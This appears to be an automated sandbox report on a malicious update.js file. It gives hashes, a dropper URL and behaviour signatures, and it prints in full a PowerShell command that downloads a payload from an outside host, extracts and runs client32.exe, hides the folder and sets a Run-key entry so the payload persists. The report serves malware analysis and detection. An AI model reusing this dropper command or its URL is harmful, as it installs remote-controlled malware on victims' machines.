Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
18-04-2024 15:31
General
-
Target
update.js
-
Size
14.0MB
-
MD5
f5939cb008c6b2f0b14ada53776fe570
-
SHA1
1f536bd1399548d04aa0b4b6a74d5a8c12e3c643
-
SHA256
a6125ebaa40f9c6eb9fe9b753c9f066e43713cab31c464d1601f7a2abdbe7c02
-
SHA512
a5ccbc4ef7cd0f5a5ce34852fc4596573d1445a5563facb767d155371203916fd29d5ba2ab56507fed52e0c6979083a905f5cd9f8f579b5e709d7ae2f428ed61
-
SSDEEP
49152:87V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcER:m
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
https://beautyservicenearme.com/data.php?8838
exe.dropper
https://beautyservicenearme.com/data.php?8838
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\update.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UcZctLCmEtbcnvSYsTGhPQubtWwaaIDl='https://beautyservicenearme.com/data.php?8838';$MoIFydvsffaOFrkbuhxurBLYbzH=(New-Object System.Net.WebClient).DownloadString($UcZctLCmEtbcnvSYsTGhPQubtWwaaIDl);$IgFsyQktTRAIEbAiPQTXmgSkFbxoHRq=[System.Convert]::FromBase64String($MoIFydvsffaOFrkbuhxurBLYbzH);$zxc = Get-Random -Minimum -5 -Maximum 17; $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -PathType Container)) { New-Item -Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -ItemType Directory };$p=Join-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF 'BB.zip';[System.IO.File]::WriteAllBytes($p,$IgFsyQktTRAIEbAiPQTXmgSkFbxoHRq);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -Force; $AZ.attributes='Hidden';$s=$EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE_C';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB